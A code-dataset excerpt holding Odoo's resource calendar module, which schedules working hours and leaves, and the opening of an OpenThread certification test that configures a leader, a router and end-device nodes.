repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
bakhtout/odoo-educ | addons/resource/resource.py | 174 | 42653 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-TODAY OpenERP SA (http://www.openerp.com)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import datetime
from dateutil import rrule
from dateutil.relativedelta import relativedelta
from operator import itemgetter
from openerp import tools
from openerp.osv import fields, osv
from openerp.tools.float_utils import float_compare
from openerp.tools.translate import _
class resource_calendar(osv.osv):
""" Calendar model for a resource. It has
- attendance_ids: list of resource.calendar.attendance that are a working
interval in a given weekday.
- leave_ids: list of leaves linked to this calendar. A leave can be general
or linked to a specific resource, depending on its resource_id.
All methods in this class use intervals. An interval is a tuple holding
(begin_datetime, end_datetime). A list of intervals is therefore a list of
tuples, holding several intervals of work or leaves. """
_name = "resource.calendar"
_description = "Resource Calendar"
_columns = {
'name': fields.char("Name", required=True),
'company_id': fields.many2one('res.company', 'Company', required=False),
'attendance_ids': fields.one2many('resource.calendar.attendance', 'calendar_id', 'Working Time', copy=True),
'manager': fields.many2one('res.users', 'Workgroup Manager'),
'leave_ids': fields.one2many(
'resource.calendar.leaves', 'calendar_id', 'Leaves',
help=''
),
}
_defaults = {
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.calendar', context=context)
}
# --------------------------------------------------
# Utility methods
# --------------------------------------------------
def interval_clean(self, intervals):
""" Utility method that sorts and removes overlapping inside datetime
intervals. The intervals are sorted based on increasing starting datetime.
Overlapping intervals are merged into a single one.
:param list intervals: list of intervals; each interval is a tuple
(datetime_from, datetime_to)
:return list cleaned: list of sorted intervals without overlap """
intervals = sorted(intervals, key=itemgetter(0)) # sort on first datetime
cleaned = []
working_interval = None
while intervals:
current_interval = intervals.pop(0)
if not working_interval: # init
working_interval = [current_interval[0], current_interval[1]]
elif working_interval[1] < current_interval[0]: # interval is disjoint
cleaned.append(tuple(working_interval))
working_interval = [current_interval[0], current_interval[1]]
elif working_interval[1] < current_interval[1]: # union of greater intervals
working_interval[1] = current_interval[1]
if working_interval: # handle void lists
cleaned.append(tuple(working_interval))
return cleaned
def interval_remove_leaves(self, interval, leave_intervals):
""" Utility method that remove leave intervals from a base interval:
- clean the leave intervals, to have an ordered list of not-overlapping
intervals
- initiate the current interval to be the base interval
- for each leave interval:
- finishing before the current interval: skip, go to next
- beginning after the current interval: skip and get out of the loop
because we are outside range (leaves are ordered)
- beginning within the current interval: close the current interval
and begin a new current interval that begins at the end of the leave
interval
- ending within the current interval: update the current interval begin
to match the leave interval ending
:param tuple interval: a tuple (beginning datetime, ending datetime) that
is the base interval from which the leave intervals
will be removed
:param list leave_intervals: a list of tuples (beginning datetime, ending datetime)
that are intervals to remove from the base interval
:return list intervals: a list of tuples (begin datetime, end datetime)
that are the remaining valid intervals """
if not interval:
return interval
if leave_intervals is None:
leave_intervals = []
intervals = []
leave_intervals = self.interval_clean(leave_intervals)
current_interval = [interval[0], interval[1]]
for leave in leave_intervals:
if leave[1] <= current_interval[0]:
continue
if leave[0] >= current_interval[1]:
break
if current_interval[0] < leave[0] < current_interval[1]:
current_interval[1] = leave[0]
intervals.append((current_interval[0], current_interval[1]))
current_interval = [leave[1], interval[1]]
# if current_interval[0] <= leave[1] <= current_interval[1]:
if current_interval[0] <= leave[1]:
current_interval[0] = leave[1]
if current_interval and current_interval[0] < interval[1]: # remove intervals moved outside base interval due to leaves
intervals.append((current_interval[0], current_interval[1]))
return intervals
def interval_schedule_hours(self, intervals, hour, remove_at_end=True):
""" Schedule hours in intervals. The last matching interval is truncated
to match the specified hours.
It is possible to truncate the last interval at its beginning or ending.
However this does nothing on the given interval order that should be
submitted accordingly.
:param list intervals: a list of tuples (beginning datetime, ending datetime)
:param int/float hours: number of hours to schedule. It will be converted
into a timedelta, but should be submitted as an
int or float.
:param boolean remove_at_end: remove extra hours at the end of the last
matching interval. Otherwise, do it at the
beginning.
:return list results: a list of intervals. If the number of hours to schedule
is greater than the possible scheduling in the intervals, no extra-scheduling
is done, and results == intervals. """
results = []
res = datetime.timedelta()
limit = datetime.timedelta(hours=hour)
for interval in intervals:
res += interval[1] - interval[0]
if res > limit and remove_at_end:
interval = (interval[0], interval[1] + relativedelta(seconds=seconds(limit-res)))
elif res > limit:
interval = (interval[0] + relativedelta(seconds=seconds(res-limit)), interval[1])
results.append(interval)
if res > limit:
break
return results
# --------------------------------------------------
# Date and hours computation
# --------------------------------------------------
def get_attendances_for_weekdays(self, cr, uid, id, weekdays, context=None):
""" Given a list of weekdays, return matching resource.calendar.attendance"""
calendar = self.browse(cr, uid, id, context=None)
return [att for att in calendar.attendance_ids if int(att.dayofweek) in weekdays]
def get_weekdays(self, cr, uid, id, default_weekdays=None, context=None):
""" Return the list of weekdays that contain at least one working interval.
If no id is given (no calendar), return default weekdays. """
if id is None:
return default_weekdays if default_weekdays is not None else [0, 1, 2, 3, 4]
calendar = self.browse(cr, uid, id, context=None)
weekdays = set()
for attendance in calendar.attendance_ids:
weekdays.add(int(attendance.dayofweek))
return list(weekdays)
def get_next_day(self, cr, uid, id, day_date, context=None):
""" Get following date of day_date, based on resource.calendar. If no
calendar is provided, just return the next day.
:param int id: id of a resource.calendar. If not given, simply add one day
to the submitted date.
:param date day_date: current day as a date
:return date: next day of calendar, or just next day """
if not id:
return day_date + relativedelta(days=1)
weekdays = self.get_weekdays(cr, uid, id, context)
base_index = -1
for weekday in weekdays:
if weekday > day_date.weekday():
break
base_index += 1
new_index = (base_index + 1) % len(weekdays)
days = (weekdays[new_index] - day_date.weekday())
if days < 0:
days = 7 + days
return day_date + relativedelta(days=days)
def get_previous_day(self, cr, uid, id, day_date, context=None):
""" Get previous date of day_date, based on resource.calendar. If no
calendar is provided, just return the previous day.
:param int id: id of a resource.calendar. If not given, simply remove
one day from the submitted date.
:param date day_date: current day as a date
:return date: previous day of calendar, or just previous day """
if not id:
return day_date + relativedelta(days=-1)
weekdays = self.get_weekdays(cr, uid, id, context)
weekdays.reverse()
base_index = -1
for weekday in weekdays:
if weekday < day_date.weekday():
break
base_index += 1
new_index = (base_index + 1) % len(weekdays)
days = (weekdays[new_index] - day_date.weekday())
if days > 0:
days = days - 7
return day_date + relativedelta(days=days)
def get_leave_intervals(self, cr, uid, id, resource_id=None,
start_datetime=None, end_datetime=None,
context=None):
"""Get the leaves of the calendar. Leaves can be filtered on the resource,
the start datetime or the end datetime.
:param int resource_id: the id of the resource to take into account when
computing the leaves. If not set, only general
leaves are computed. If set, generic and
specific leaves are computed.
:param datetime start_datetime: if provided, do not take into account leaves
ending before this date.
:param datetime end_datetime: if provided, do not take into account leaves
beginning after this date.
:return list leaves: list of tuples (start_datetime, end_datetime) of
leave intervals
"""
resource_calendar = self.browse(cr, uid, id, context=context)
leaves = []
for leave in resource_calendar.leave_ids:
if leave.resource_id and not resource_id == leave.resource_id.id:
continue
date_from = datetime.datetime.strptime(leave.date_from, tools.DEFAULT_SERVER_DATETIME_FORMAT)
if end_datetime and date_from > end_datetime:
continue
date_to = datetime.datetime.strptime(leave.date_to, tools.DEFAULT_SERVER_DATETIME_FORMAT)
if start_datetime and date_to < start_datetime:
continue
leaves.append((date_from, date_to))
return leaves
def get_working_intervals_of_day(self, cr, uid, id, start_dt=None, end_dt=None,
leaves=None, compute_leaves=False, resource_id=None,
default_interval=None, context=None):
""" Get the working intervals of the day based on calendar. This method
handle leaves that come directly from the leaves parameter or can be computed.
:param int id: resource.calendar id; take the first one if is a list
:param datetime start_dt: datetime object that is the beginning hours
for the working intervals computation; any
working interval beginning before start_dt
will be truncated. If not set, set to end_dt
or today() if no end_dt at 00.00.00.
:param datetime end_dt: datetime object that is the ending hour
for the working intervals computation; any
working interval ending after end_dt
will be truncated. If not set, set to start_dt()
at 23.59.59.
:param list leaves: a list of tuples(start_datetime, end_datetime) that
represent leaves.
:param boolean compute_leaves: if set and if leaves is None, compute the
leaves based on calendar and resource.
If leaves is None and compute_leaves false
no leaves are taken into account.
:param int resource_id: the id of the resource to take into account when
computing the leaves. If not set, only general
leaves are computed. If set, generic and
specific leaves are computed.
:param tuple default_interval: if no id, try to return a default working
day using default_interval[0] as beginning
hour, and default_interval[1] as ending hour.
Example: default_interval = (8, 16).
Otherwise, a void list of working intervals
is returned when id is None.
:return list intervals: a list of tuples (start_datetime, end_datetime)
of work intervals """
if isinstance(id, (list, tuple)):
id = id[0]
# Computes start_dt, end_dt (with default values if not set) + off-interval work limits
work_limits = []
if start_dt is None and end_dt is not None:
start_dt = end_dt.replace(hour=0, minute=0, second=0)
elif start_dt is None:
start_dt = datetime.datetime.now().replace(hour=0, minute=0, second=0)
else:
work_limits.append((start_dt.replace(hour=0, minute=0, second=0), start_dt))
if end_dt is None:
end_dt = start_dt.replace(hour=23, minute=59, second=59)
else:
work_limits.append((end_dt, end_dt.replace(hour=23, minute=59, second=59)))
assert start_dt.date() == end_dt.date(), 'get_working_intervals_of_day is restricted to one day'
intervals = []
work_dt = start_dt.replace(hour=0, minute=0, second=0)
# no calendar: try to use the default_interval, then return directly
if id is None:
if default_interval:
working_interval = (start_dt.replace(hour=default_interval[0], minute=0, second=0), start_dt.replace(hour=default_interval[1], minute=0, second=0))
intervals = self.interval_remove_leaves(working_interval, work_limits)
return intervals
working_intervals = []
for calendar_working_day in self.get_attendances_for_weekdays(cr, uid, id, [start_dt.weekday()], context):
working_interval = (
work_dt.replace(hour=int(calendar_working_day.hour_from)),
work_dt.replace(hour=int(calendar_working_day.hour_to))
)
working_intervals += self.interval_remove_leaves(working_interval, work_limits)
# find leave intervals
if leaves is None and compute_leaves:
leaves = self.get_leave_intervals(cr, uid, id, resource_id=resource_id, context=None)
# filter according to leaves
for interval in working_intervals:
work_intervals = self.interval_remove_leaves(interval, leaves)
intervals += work_intervals
return intervals
def get_working_hours_of_date(self, cr, uid, id, start_dt=None, end_dt=None,
leaves=None, compute_leaves=False, resource_id=None,
default_interval=None, context=None):
""" Get the working hours of the day based on calendar. This method uses
get_working_intervals_of_day to have the work intervals of the day. It
then calculates the number of hours contained in those intervals. """
res = datetime.timedelta()
intervals = self.get_working_intervals_of_day(
cr, uid, id,
start_dt, end_dt, leaves,
compute_leaves, resource_id,
default_interval, context)
for interval in intervals:
res += interval[1] - interval[0]
return seconds(res) / 3600.0
def get_working_hours(self, cr, uid, id, start_dt, end_dt, compute_leaves=False,
resource_id=None, default_interval=None, context=None):
hours = 0.0
for day in rrule.rrule(rrule.DAILY, dtstart=start_dt,
until=(end_dt + datetime.timedelta(days=1)).replace(hour=0, minute=0, second=0),
byweekday=self.get_weekdays(cr, uid, id, context=context)):
day_start_dt = day.replace(hour=0, minute=0, second=0)
if start_dt and day.date() == start_dt.date():
day_start_dt = start_dt
day_end_dt = day.replace(hour=23, minute=59, second=59)
if end_dt and day.date() == end_dt.date():
day_end_dt = end_dt
hours += self.get_working_hours_of_date(
cr, uid, id, start_dt=day_start_dt, end_dt=day_end_dt,
compute_leaves=compute_leaves, resource_id=resource_id,
default_interval=default_interval,
context=context)
return hours
# --------------------------------------------------
# Hours scheduling
# --------------------------------------------------
def _schedule_hours(self, cr, uid, id, hours, day_dt=None,
compute_leaves=False, resource_id=None,
default_interval=None, context=None):
""" Schedule hours of work, using a calendar and an optional resource to
compute working and leave days. This method can be used backwards, i.e.
scheduling days before a deadline.
:param int hours: number of hours to schedule. Use a negative number to
compute a backwards scheduling.
:param datetime day_dt: reference date to compute working days. If days is
> 0 date is the starting date. If days is < 0
date is the ending date.
:param boolean compute_leaves: if set, compute the leaves based on calendar
and resource. Otherwise no leaves are taken
into account.
:param int resource_id: the id of the resource to take into account when
computing the leaves. If not set, only general
leaves are computed. If set, generic and
specific leaves are computed.
:param tuple default_interval: if no id, try to return a default working
day using default_interval[0] as beginning
hour, and default_interval[1] as ending hour.
Example: default_interval = (8, 16).
Otherwise, a void list of working intervals
is returned when id is None.
:return tuple (datetime, intervals): datetime is the beginning/ending date
of the schedulign; intervals are the
working intervals of the scheduling.
Note: Why not using rrule.rrule ? Because rrule does not seem to allow
getting back in time.
"""
if day_dt is None:
day_dt = datetime.datetime.now()
backwards = (hours < 0)
hours = abs(hours)
intervals = []
remaining_hours = hours * 1.0
iterations = 0
current_datetime = day_dt
call_args = dict(compute_leaves=compute_leaves, resource_id=resource_id, default_interval=default_interval, context=context)
while float_compare(remaining_hours, 0.0, precision_digits=2) in (1, 0) and iterations < 1000:
if backwards:
call_args['end_dt'] = current_datetime
else:
call_args['start_dt'] = current_datetime
working_intervals = self.get_working_intervals_of_day(cr, uid, id, **call_args)
if id is None and not working_intervals: # no calendar -> consider working 8 hours
remaining_hours -= 8.0
elif working_intervals:
if backwards:
working_intervals.reverse()
new_working_intervals = self.interval_schedule_hours(working_intervals, remaining_hours, not backwards)
if backwards:
new_working_intervals.reverse()
res = datetime.timedelta()
for interval in working_intervals:
res += interval[1] - interval[0]
remaining_hours -= (seconds(res) / 3600.0)
if backwards:
intervals = new_working_intervals + intervals
else:
intervals = intervals + new_working_intervals
# get next day
if backwards:
current_datetime = datetime.datetime.combine(self.get_previous_day(cr, uid, id, current_datetime, context), datetime.time(23, 59, 59))
else:
current_datetime = datetime.datetime.combine(self.get_next_day(cr, uid, id, current_datetime, context), datetime.time())
# avoid infinite loops
iterations += 1
return intervals
def schedule_hours_get_date(self, cr, uid, id, hours, day_dt=None,
compute_leaves=False, resource_id=None,
default_interval=None, context=None):
""" Wrapper on _schedule_hours: return the beginning/ending datetime of
an hours scheduling. """
res = self._schedule_hours(cr, uid, id, hours, day_dt, compute_leaves, resource_id, default_interval, context)
return res and res[0][0] or False
def schedule_hours(self, cr, uid, id, hours, day_dt=None,
compute_leaves=False, resource_id=None,
default_interval=None, context=None):
""" Wrapper on _schedule_hours: return the working intervals of an hours
scheduling. """
return self._schedule_hours(cr, uid, id, hours, day_dt, compute_leaves, resource_id, default_interval, context)
# --------------------------------------------------
# Days scheduling
# --------------------------------------------------
def _schedule_days(self, cr, uid, id, days, day_date=None, compute_leaves=False,
resource_id=None, default_interval=None, context=None):
"""Schedule days of work, using a calendar and an optional resource to
compute working and leave days. This method can be used backwards, i.e.
scheduling days before a deadline.
:param int days: number of days to schedule. Use a negative number to
compute a backwards scheduling.
:param date day_date: reference date to compute working days. If days is > 0
date is the starting date. If days is < 0 date is the
ending date.
:param boolean compute_leaves: if set, compute the leaves based on calendar
and resource. Otherwise no leaves are taken
into account.
:param int resource_id: the id of the resource to take into account when
computing the leaves. If not set, only general
leaves are computed. If set, generic and
specific leaves are computed.
:param tuple default_interval: if no id, try to return a default working
day using default_interval[0] as beginning
hour, and default_interval[1] as ending hour.
Example: default_interval = (8, 16).
Otherwise, a void list of working intervals
is returned when id is None.
:return tuple (datetime, intervals): datetime is the beginning/ending date
of the schedulign; intervals are the
working intervals of the scheduling.
Implementation note: rrule.rrule is not used because rrule it des not seem
to allow getting back in time.
"""
if day_date is None:
day_date = datetime.datetime.now()
backwards = (days < 0)
days = abs(days)
intervals = []
planned_days = 0
iterations = 0
if backwards:
current_datetime = day_date.replace(hour=23, minute=59, second=59)
else:
current_datetime = day_date.replace(hour=0, minute=0, second=0)
while planned_days < days and iterations < 1000:
working_intervals = self.get_working_intervals_of_day(
cr, uid, id, current_datetime,
compute_leaves=compute_leaves, resource_id=resource_id,
default_interval=default_interval,
context=context)
if id is None or working_intervals: # no calendar -> no working hours, but day is considered as worked
planned_days += 1
intervals += working_intervals
# get next day
if backwards:
current_datetime = self.get_previous_day(cr, uid, id, current_datetime, context)
else:
current_datetime = self.get_next_day(cr, uid, id, current_datetime, context)
# avoid infinite loops
iterations += 1
return intervals
def schedule_days_get_date(self, cr, uid, id, days, day_date=None, compute_leaves=False,
resource_id=None, default_interval=None, context=None):
""" Wrapper on _schedule_days: return the beginning/ending datetime of
a days scheduling. """
res = self._schedule_days(cr, uid, id, days, day_date, compute_leaves, resource_id, default_interval, context)
return res and res[-1][1] or False
def schedule_days(self, cr, uid, id, days, day_date=None, compute_leaves=False,
resource_id=None, default_interval=None, context=None):
""" Wrapper on _schedule_days: return the working intervals of a days
scheduling. """
return self._schedule_days(cr, uid, id, days, day_date, compute_leaves, resource_id, default_interval, context)
# --------------------------------------------------
# Compatibility / to clean / to remove
# --------------------------------------------------
def working_hours_on_day(self, cr, uid, resource_calendar_id, day, context=None):
""" Used in hr_payroll/hr_payroll.py
:deprecated: OpenERP saas-3. Use get_working_hours_of_date instead. Note:
since saas-3, take hour/minutes into account, not just the whole day."""
if isinstance(day, datetime.datetime):
day = day.replace(hour=0, minute=0)
return self.get_working_hours_of_date(cr, uid, resource_calendar_id.id, start_dt=day, context=None)
def interval_min_get(self, cr, uid, id, dt_from, hours, resource=False):
""" Schedule hours backwards. Used in mrp_operations/mrp_operations.py.
:deprecated: OpenERP saas-3. Use schedule_hours instead. Note: since
saas-3, counts leave hours instead of all-day leaves."""
return self.schedule_hours(
cr, uid, id, hours * -1.0,
day_dt=dt_from.replace(minute=0, second=0),
compute_leaves=True, resource_id=resource,
default_interval=(8, 16)
)
def interval_get_multi(self, cr, uid, date_and_hours_by_cal, resource=False, byday=True):
""" Used in mrp_operations/mrp_operations.py (default parameters) and in
interval_get()
:deprecated: OpenERP saas-3. Use schedule_hours instead. Note:
Byday was not used. Since saas-3, counts Leave hours instead of all-day leaves."""
res = {}
for dt_str, hours, calendar_id in date_and_hours_by_cal:
result = self.schedule_hours(
cr, uid, calendar_id, hours,
day_dt=datetime.datetime.strptime(dt_str, '%Y-%m-%d %H:%M:%S').replace(minute=0, second=0),
compute_leaves=True, resource_id=resource,
default_interval=(8, 16)
)
res[(dt_str, hours, calendar_id)] = result
return res
def interval_get(self, cr, uid, id, dt_from, hours, resource=False, byday=True):
""" Unifier of interval_get_multi. Used in: mrp_operations/mrp_operations.py,
crm/crm_lead.py (res given).
:deprecated: OpenERP saas-3. Use get_working_hours instead."""
res = self.interval_get_multi(
cr, uid, [(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)], resource, byday)[(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)]
return res
def interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource=False):
""" Unused wrapper.
:deprecated: OpenERP saas-3. Use get_working_hours instead."""
return self._interval_hours_get(cr, uid, id, dt_from, dt_to, resource_id=resource)
def _interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource_id=False, timezone_from_uid=None, exclude_leaves=True, context=None):
""" Computes working hours between two dates, taking always same hour/minuts.
:deprecated: OpenERP saas-3. Use get_working_hours instead. Note: since saas-3,
now resets hour/minuts. Now counts leave hours instead of all-day leaves."""
return self.get_working_hours(
cr, uid, id, dt_from, dt_to,
compute_leaves=(not exclude_leaves), resource_id=resource_id,
default_interval=(8, 16), context=context)
class resource_calendar_attendance(osv.osv):
_name = "resource.calendar.attendance"
_description = "Work Detail"
_columns = {
'name' : fields.char("Name", required=True),
'dayofweek': fields.selection([('0','Monday'),('1','Tuesday'),('2','Wednesday'),('3','Thursday'),('4','Friday'),('5','Saturday'),('6','Sunday')], 'Day of Week', required=True, select=True),
'date_from' : fields.date('Starting Date'),
'hour_from' : fields.float('Work from', required=True, help="Start and End time of working.", select=True),
'hour_to' : fields.float("Work to", required=True),
'calendar_id' : fields.many2one("resource.calendar", "Resource's Calendar", required=True),
}
_order = 'dayofweek, hour_from'
_defaults = {
'dayofweek' : '0'
}
def hours_time_string(hours):
""" convert a number of hours (float) into a string with format '%H:%M' """
minutes = int(round(hours * 60))
return "%02d:%02d" % divmod(minutes, 60)
class resource_resource(osv.osv):
_name = "resource.resource"
_description = "Resource Detail"
_columns = {
'name': fields.char("Name", required=True),
'code': fields.char('Code', size=16, copy=False),
'active' : fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the resource record without removing it."),
'company_id' : fields.many2one('res.company', 'Company'),
'resource_type': fields.selection([('user','Human'),('material','Material')], 'Resource Type', required=True),
'user_id' : fields.many2one('res.users', 'User', help='Related user name for the resource to manage its access.'),
'time_efficiency' : fields.float('Efficiency Factor', size=8, required=True, help="This field depict the efficiency of the resource to complete tasks. e.g resource put alone on a phase of 5 days with 5 tasks assigned to him, will show a load of 100% for this phase by default, but if we put a efficiency of 200%, then his load will only be 50%."),
'calendar_id' : fields.many2one("resource.calendar", "Working Time", help="Define the schedule of resource"),
}
_defaults = {
'resource_type' : 'user',
'time_efficiency' : 1,
'active' : True,
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.resource', context=context)
}
def copy(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
if not default.get('name', False):
default.update(name=_('%s (copy)') % (self.browse(cr, uid, id, context=context).name))
return super(resource_resource, self).copy(cr, uid, id, default, context)
def generate_resources(self, cr, uid, user_ids, calendar_id, context=None):
"""
Return a list of Resource Class objects for the resources allocated to the phase.
NOTE: Used in project/project.py
"""
resource_objs = {}
user_pool = self.pool.get('res.users')
for user in user_pool.browse(cr, uid, user_ids, context=context):
resource_objs[user.id] = {
'name' : user.name,
'vacation': [],
'efficiency': 1.0,
}
resource_ids = self.search(cr, uid, [('user_id', '=', user.id)], context=context)
if resource_ids:
for resource in self.browse(cr, uid, resource_ids, context=context):
resource_objs[user.id]['efficiency'] = resource.time_efficiency
resource_cal = resource.calendar_id.id
if resource_cal:
leaves = self.compute_vacation(cr, uid, calendar_id, resource.id, resource_cal, context=context)
resource_objs[user.id]['vacation'] += list(leaves)
return resource_objs
def compute_vacation(self, cr, uid, calendar_id, resource_id=False, resource_calendar=False, context=None):
"""
Compute the vacation from the working calendar of the resource.
@param calendar_id : working calendar of the project
@param resource_id : resource working on phase/task
@param resource_calendar : working calendar of the resource
NOTE: used in project/project.py, and in generate_resources
"""
resource_calendar_leaves_pool = self.pool.get('resource.calendar.leaves')
leave_list = []
if resource_id:
leave_ids = resource_calendar_leaves_pool.search(cr, uid, ['|', ('calendar_id', '=', calendar_id),
('calendar_id', '=', resource_calendar),
('resource_id', '=', resource_id)
], context=context)
else:
leave_ids = resource_calendar_leaves_pool.search(cr, uid, [('calendar_id', '=', calendar_id),
('resource_id', '=', False)
], context=context)
leaves = resource_calendar_leaves_pool.read(cr, uid, leave_ids, ['date_from', 'date_to'], context=context)
for i in range(len(leaves)):
dt_start = datetime.datetime.strptime(leaves[i]['date_from'], '%Y-%m-%d %H:%M:%S')
dt_end = datetime.datetime.strptime(leaves[i]['date_to'], '%Y-%m-%d %H:%M:%S')
no = dt_end - dt_start
[leave_list.append((dt_start + datetime.timedelta(days=x)).strftime('%Y-%m-%d')) for x in range(int(no.days + 1))]
leave_list.sort()
return leave_list
def compute_working_calendar(self, cr, uid, calendar_id=False, context=None):
"""
Change the format of working calendar from 'Openerp' format to bring it into 'Faces' format.
@param calendar_id : working calendar of the project
NOTE: used in project/project.py
"""
if not calendar_id:
# Calendar is not specified: working days: 24/7
return [('fri', '8:0-12:0','13:0-17:0'), ('thu', '8:0-12:0','13:0-17:0'), ('wed', '8:0-12:0','13:0-17:0'),
('mon', '8:0-12:0','13:0-17:0'), ('tue', '8:0-12:0','13:0-17:0')]
resource_attendance_pool = self.pool.get('resource.calendar.attendance')
time_range = "8:00-8:00"
non_working = ""
week_days = {"0": "mon", "1": "tue", "2": "wed","3": "thu", "4": "fri", "5": "sat", "6": "sun"}
wk_days = {}
wk_time = {}
wktime_list = []
wktime_cal = []
week_ids = resource_attendance_pool.search(cr, uid, [('calendar_id', '=', calendar_id)], context=context)
weeks = resource_attendance_pool.read(cr, uid, week_ids, ['dayofweek', 'hour_from', 'hour_to'], context=context)
# Convert time formats into appropriate format required
# and create a list like [('mon', '8:00-12:00'), ('mon', '13:00-18:00')]
for week in weeks:
res_str = ""
day = None
if week_days.get(week['dayofweek'],False):
day = week_days[week['dayofweek']]
wk_days[week['dayofweek']] = week_days[week['dayofweek']]
else:
raise osv.except_osv(_('Configuration Error!'),_('Make sure the Working time has been configured with proper week days!'))
hour_from_str = hours_time_string(week['hour_from'])
hour_to_str = hours_time_string(week['hour_to'])
res_str = hour_from_str + '-' + hour_to_str
wktime_list.append((day, res_str))
# Convert into format like [('mon', '8:00-12:00', '13:00-18:00')]
for item in wktime_list:
if wk_time.has_key(item[0]):
wk_time[item[0]].append(item[1])
else:
wk_time[item[0]] = [item[0]]
wk_time[item[0]].append(item[1])
for k,v in wk_time.items():
wktime_cal.append(tuple(v))
# Add for the non-working days like: [('sat, sun', '8:00-8:00')]
for k, v in wk_days.items():
if week_days.has_key(k):
week_days.pop(k)
for v in week_days.itervalues():
non_working += v + ','
if non_working:
wktime_cal.append((non_working[:-1], time_range))
return wktime_cal
class resource_calendar_leaves(osv.osv):
_name = "resource.calendar.leaves"
_description = "Leave Detail"
_columns = {
'name' : fields.char("Name"),
'company_id' : fields.related('calendar_id','company_id',type='many2one',relation='res.company',string="Company", store=True, readonly=True),
'calendar_id' : fields.many2one("resource.calendar", "Working Time"),
'date_from' : fields.datetime('Start Date', required=True),
'date_to' : fields.datetime('End Date', required=True),
'resource_id' : fields.many2one("resource.resource", "Resource", help="If empty, this is a generic holiday for the company. If a resource is set, the holiday/leave is only for this resource"),
}
def check_dates(self, cr, uid, ids, context=None):
for leave in self.browse(cr, uid, ids, context=context):
if leave.date_from and leave.date_to and leave.date_from > leave.date_to:
return False
return True
_constraints = [
(check_dates, 'Error! leave start-date must be lower then leave end-date.', ['date_from', 'date_to'])
]
def onchange_resource(self, cr, uid, ids, resource, context=None):
result = {}
if resource:
resource_pool = self.pool.get('resource.resource')
result['calendar_id'] = resource_pool.browse(cr, uid, resource, context=context).calendar_id.id
return {'value': result}
return {'value': {'calendar_id': []}}
def seconds(td):
assert isinstance(td, datetime.timedelta)
return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10.**6
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
aeliot/openthread | tests/scripts/thread-cert/Cert_7_1_01_BorderRouterAsLeader.py | 4 | 4545 | #!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import time
import unittest
import node
LEADER = 1
ROUTER = 2
SED1 = 3
ED1 = 4
MTDS = [SED1, ED1]
class Cert_7_1_1_BorderRouterAsLeader(unittest.TestCase):
def setUp(self):
self.nodes = {}
for i in range(1,5):
self.nodes[i] = node.Node(i, (i in MTDS))
self.nodes[LEADER].set_panid(0xface)
self.nodes[LEADER].set_mode('rsdn')
self.nodes[LEADER].add_whitelist(self.nodes[ROUTER].get_addr64())
self.nodes[LEADER].add_whitelist(self.nodes[SED1].get_addr64())
self.nodes[LEADER].add_whitelist(self.nodes[ED1].get_addr64())
self.nodes[LEADER].enable_whitelist()
self.nodes[ROUTER].set_panid(0xface)
self.nodes[ROUTER].set_mode('rsdn')
self.nodes[ROUTER].add_whitelist(self.nodes[LEADER].get_addr64())
self.nodes[ROUTER].enable_whitelist()
self.nodes[ROUTER].set_router_selection_jitter(1)
self.nodes[SED1].set_panid(0xface)
self.nodes[SED1].set_mode('s')
self.nodes[SED1].add_whitelist(self.nodes[LEADER].get_addr64())
self.nodes[SED1].enable_whitelist()
self.nodes[SED1].set_timeout(3)
self.nodes[ED1].set_panid(0xface)
self.nodes[ED1].set_mode('rsn')
self.nodes[ED1].add_whitelist(self.nodes[LEADER].get_addr64())
self.nodes[ED1].enable_whitelist()
def tearDown(self):
for node in list(self.nodes.values()):
node.stop()
del self.nodes
def test(self):
self.nodes[LEADER].start()
self.nodes[LEADER].set_state('leader')
self.assertEqual(self.nodes[LEADER].get_state(), 'leader')
